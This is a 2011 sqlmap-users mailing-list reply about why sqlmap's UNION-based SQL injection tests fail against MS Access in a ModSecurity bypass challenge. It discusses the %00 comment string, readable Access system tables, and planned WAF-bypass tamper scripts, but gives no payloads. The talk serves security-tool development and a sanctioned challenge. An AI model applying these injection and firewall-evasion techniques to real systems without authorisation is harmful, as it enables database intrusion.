Hi Marek, On 5 July 2011 22:33, Stiefenhofer, Marek <m.stiefenho...@r-tec.net> wrote: > ... > Miroslav posted some news about an ongoing SQLi ModSecurity challenge. I was > curious and had a quick look at it. One of the vulnerable applications has > an MS Access DB and can be UNION based injected.
Two of them are Access, the other two are MySQL 4 and MySQL 5.0. We will post the details about our bypass of modsecurity soon and the related tamper scripts will be committed to sqlmap trunk as well. > Unfortunately UNION based tests against MS Access will always fail with > sqlmap, because for UNION based injections the defined comment string > (queries.xml) is not respected. Access needs %00 as comment string and even > this is not working in many cases. This is a known problem. Just addressed, read below. > One quick fix would be adding special Access UNION test definitions to > payload.xml like it has been done for MySQL. Handle of these corner cases specifically to detect a certain technique against a dodgy database management system is in our TODO list already. Also, MSysAccessObjects seems to be a viable option. Detection of UNION query against Access is now fixed. > Another problem is the defined SELECT_FROM for MS Access dbms, it’s > MSysObjects. In the ModSecurity challenge this system table has no read > permissions hence any UNION test must fail. But the system table > MSysAccessXML has read permissions in this specific case. > > Does anyone know, which of the two tables is more likely to have read access > in the wild? Does it make sense to change SELECT_FROM? Is MSysAccessXML > present in older MS Access versions? No users have read privileges over MSysObjects by default. I can't comment on MSysAccessXML. Anyone else? -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable ------------------------------------------------------------------------------ All of the data generated in your IT infrastructure is seriously valuable. Why? It contains a definitive record of application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-d2d-c2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
